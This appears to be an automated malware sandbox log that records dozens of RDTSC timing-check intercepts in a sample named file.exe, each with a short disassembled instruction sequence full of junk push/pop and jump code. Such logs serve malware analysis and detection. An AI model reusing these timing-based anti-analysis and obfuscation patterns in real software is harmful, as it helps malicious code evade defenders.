          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1BB second address: 64C1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F37B4537096h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1C7 second address: 64C1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F37B4535CDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1DC second address: 64C1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1E0 second address: 64C1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C39E second address: 64C3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDBD second address: 64CDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDCB second address: 64CDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F37B453709Fh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDDF second address: 64CDFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F37B4535CE7h 0x00000008 pop ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651532 second address: 65153C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B45370ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6516E1 second address: 6516E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6516E5 second address: 6516EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6611B5 second address: 6611C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F37B4535CD6h 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6611C0 second address: 6611D4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F37B453709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6611D4 second address: 6611D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6714ED second address: 6714F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6714F1 second address: 671500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671500 second address: 671508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671508 second address: 67150C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67150C second address: 67151A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67151A second address: 67151E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67151E second address: 671528 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F37B4537096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671057 second address: 671068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F37B4535CD6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671068 second address: 671094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B45370A5h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671094 second address: 671099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671099 second address: 6710AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F37B453709Dh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68720B second address: 687222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D2D4 second address: 68D2F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F37B453709Ch 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68ED74 second address: 68ED78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68ED78 second address: 68ED84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F37B4537096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB03E second address: 5AB057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CE5h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB057 second address: 5AB06E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F37B45370A0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB238 second address: 5AB23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB23C second address: 5AB246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0345 second address: 4CF0362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 36D3A4EFh 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F37B4535CDAh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0362 second address: 4CF03A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F37B453709Bh 0x00000014 xor esi, 78882BDEh 0x0000001a jmp 00007F37B45370A9h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03A5 second address: 4CF03B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CDAh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03B3 second address: 4CF03D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 popad 0x00000013 mov ecx, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03D5 second address: 4CF03D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03D9 second address: 4CF03DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03DF second address: 4CF03E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03E5 second address: 4CF03E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03E9 second address: 4CF03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0402 second address: 4CF0408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0408 second address: 4CF040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF040C second address: 4CF0410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10629 second address: 4D1062E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1062E second address: 4D10692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F37B453709Fh 0x0000000f pushfd 0x00000010 jmp 00007F37B45370A8h 0x00000015 adc esi, 62E79FC8h 0x0000001b jmp 00007F37B453709Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F37B45370A6h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10692 second address: 4D10698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10698 second address: 4D1069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1069E second address: 4D106A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D106A2 second address: 4D106CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F37B45370A0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D106CF second address: 4D106D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D106D4 second address: 4D1070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov si, 0AD7h 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F37B45370A9h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1070C second address: 4D10765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F37B4535CE1h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 pushad 0x00000016 call 00007F37B4535CE4h 0x0000001b pop eax 0x0000001c jmp 00007F37B4535CDBh 0x00000021 popad 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10765 second address: 4D10780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10780 second address: 4D107BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F37B4535CE8h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D107BA second address: 4D107C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D107C9 second address: 4D10808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F37B4535CE1h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B4535CDDh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10808 second address: 4D1082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F37B453709Dh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10911 second address: 4D10917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10917 second address: 4D1093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B45370A8h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1093C second address: 4D1094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1094B second address: 4D10963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B45370A4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10963 second address: 4D10972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10972 second address: 4D10976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10976 second address: 4D1097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1097C second address: 4D10982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10982 second address: 4D10986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10986 second address: 4D1098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1098A second address: 4D10044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F37B4535E25h 0x0000001a xor eax, eax 0x0000001c mov dword ptr [esp], 00000000h 0x00000023 mov dword ptr [esp+04h], 00000000h 0x0000002b call 00007F37B8E7182Bh 0x00000030 mov edi, edi 0x00000032 jmp 00007F37B4535CE0h 0x00000037 xchg eax, ebp 0x00000038 jmp 00007F37B4535CE0h 0x0000003d push eax 0x0000003e jmp 00007F37B4535CDBh 0x00000043 xchg eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F37B4535CE0h 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10044 second address: 4D10048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10048 second address: 4D1004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1004E second address: 4D10054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10054 second address: 4D10058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10058 second address: 4D10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F37B45370A4h 0x0000000f push FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F37B45370A7h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10091 second address: 4D100D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F37B4535CD9h 0x00000010 pushad 0x00000011 call 00007F37B4535CE3h 0x00000016 jmp 00007F37B4535CE8h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D100D5 second address: 4D1016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F37B45370A8h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 mov edx, 7B16A2F4h 0x00000019 mov bx, FA60h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F37B45370A6h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a mov bh, ABh 0x0000002c mov ebx, ecx 0x0000002e popad 0x0000002f pop eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F37B45370A2h 0x00000037 add ch, 00000008h 0x0000003a jmp 00007F37B453709Bh 0x0000003f popfd 0x00000040 mov edi, ecx 0x00000042 popad 0x00000043 push 0584E1DBh 0x00000048 jmp 00007F37B453709Bh 0x0000004d add dword ptr [esp], 6FB94995h 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1016C second address: 4D10187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10187 second address: 4D101DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F37B453709Fh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F37B45370A9h 0x0000000f adc cx, 7CE6h 0x00000014 jmp 00007F37B45370A1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr fs:[00000000h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ch, bh 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D101DC second address: 4D101E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D101E2 second address: 4D101E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D101E6 second address: 4D1024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F37B4535CDEh 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F37B4535CE1h 0x00000019 sub ax, 1E56h 0x0000001e jmp 00007F37B4535CE1h 0x00000023 popfd 0x00000024 mov di, cx 0x00000027 popad 0x00000028 nop 0x00000029 jmp 00007F37B4535CDAh 0x0000002e sub esp, 18h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov si, 3553h 0x00000038 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1024C second address: 4D102B5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F37B45370A8h 0x00000008 or cx, E2D8h 0x0000000d jmp 00007F37B453709Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007F37B45370A8h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F37B45370A0h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F37B453709Eh 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D102B5 second address: 4D102F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F37B4535CE6h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B4535CE7h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D102F5 second address: 4D102FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D102FB second address: 4D10318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F37B4535CDEh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10318 second address: 4D1031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
